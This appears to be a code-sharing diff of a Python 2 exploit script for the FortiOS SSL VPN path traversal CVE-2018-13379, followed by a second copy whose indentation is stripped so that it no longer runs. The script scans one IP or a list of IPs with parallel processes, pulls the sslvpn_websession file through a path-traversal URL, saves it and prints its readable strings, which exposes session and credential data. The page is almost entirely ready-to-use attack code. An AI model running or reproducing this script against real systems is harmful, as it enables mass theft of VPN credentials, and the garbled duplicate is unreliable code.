jbelke · July 20, 2022 14:37
diff --git a/CVE-2018-13379.py b/CVE-2018-13379.py
 import requests, binascii, optparse
 from urlparse import urlparse
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 requests.packages.urllib3.disable_warnings()
 import multiprocessing

 def checkIP(ip):
 	try:
 		url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
 		headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}		
 		r=requests.get(url, headers=headers, verify=False, stream=True, timeout=2)
 		img=r.raw.read()
 		if "var fgt_lang =" in str(img):
 			with open("sslvpn_websession_"+ip+".dat", 'w') as f:
 				f.write(img)		
 			parseFile(ip)
 			print "\n"				
 			return True
 		else:
 			return False
 	except requests.exceptions.ConnectionError:
 		return False

 def read_bytes(filename, chunksize=8192):
  try:
    with open(filename, "rb") as f:
      while True:
        chunk = f.read(chunksize)
        if chunk:
          for b in chunk:
            yield b
        else:
          break
  except IOError:
    pass

 def is_character_printable(s):
  return all((ord(c) < 127) and (ord(c) >= 32) for c in s)
  
 def validate_byte_as_printable(byte):
  if is_character_printable(byte):
    return byte
  else:
    return '.'   

 def parseFile(ip):
 	print "[Checking: "+ip+"]"
 	url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
 	print "[*} Web session at: "+url
 	filename="sslvpn_websession_"+ip+".dat"
 	memory_address = 0
 	ascii_string = ""
 	for byte in read_bytes(filename):
 	  ascii_string = ascii_string + validate_byte_as_printable(byte)
 	  if memory_address%61 == 60:
 	    if ascii_string!=".............................................................":
 	    	print ascii_string
 	    ascii_string = ""
 	  memory_address = memory_address + 1

 parser = optparse.OptionParser()
 parser.add_option('-f', action="store", dest="filename")
 parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")
 parser.add_option('-n', action="store", dest="numOfThreads")
 options, remainder = parser.parse_args()
 numOfThreads=10
 ipList=[]
 if options.ip:
 	ipList.append(options.ip)
 if options.filename:
 	with open(options.filename) as f:
 		ipList = f.read().splitlines()
 if options.numOfThreads:
 	numOfThreads=int(options.numOfThreads)
 ipList = filter(None, ipList)

 p = multiprocessing.Pool(processes=numOfThreads)
 p.map(checkIP,ipList)		
 p.close()
	import requests, binascii, optparse
	from urlparse import urlparse
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	requests.packages.urllib3.disable_warnings()
	import multiprocessing

	def checkIP(ip):
	try:
	url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
	headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
	r=requests.get(url, headers=headers, verify=False, stream=True, timeout=2)
	img=r.raw.read()
	if "var fgt_lang =" in str(img):
	with open("sslvpn_websession_"+ip+".dat", 'w') as f:
	f.write(img)
	parseFile(ip)
	print "\n"
	return True
	else:
	return False
	except requests.exceptions.ConnectionError:
	return False

	def read_bytes(filename, chunksize=8192):
	try:
	with open(filename, "rb") as f:
	while True:
	chunk = f.read(chunksize)
	if chunk:
	for b in chunk:
	yield b
	else:
	break
	except IOError:
	pass

	def is_character_printable(s):
	return all((ord(c) < 127) and (ord(c) >= 32) for c in s)

	def validate_byte_as_printable(byte):
	if is_character_printable(byte):
	return byte
	else:
	return '.'

	def parseFile(ip):
	print "[Checking: "+ip+"]"
	url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
	print "[*} Web session at: "+url
	filename="sslvpn_websession_"+ip+".dat"
	memory_address = 0
	ascii_string = ""
	for byte in read_bytes(filename):
	ascii_string = ascii_string + validate_byte_as_printable(byte)
	if memory_address%61 == 60:
	if ascii_string!=".............................................................":
	print ascii_string
	ascii_string = ""
	memory_address = memory_address + 1

	parser = optparse.OptionParser()
	parser.add_option('-f', action="store", dest="filename")
	parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")
	parser.add_option('-n', action="store", dest="numOfThreads")
	options, remainder = parser.parse_args()
	numOfThreads=10
	ipList=[]
	if options.ip:
	ipList.append(options.ip)
	if options.filename:
	with open(options.filename) as f:
	ipList = f.read().splitlines()
	if options.numOfThreads:
	numOfThreads=int(options.numOfThreads)
	ipList = filter(None, ipList)

	p = multiprocessing.Pool(processes=numOfThreads)
	p.map(checkIP,ipList)
	p.close()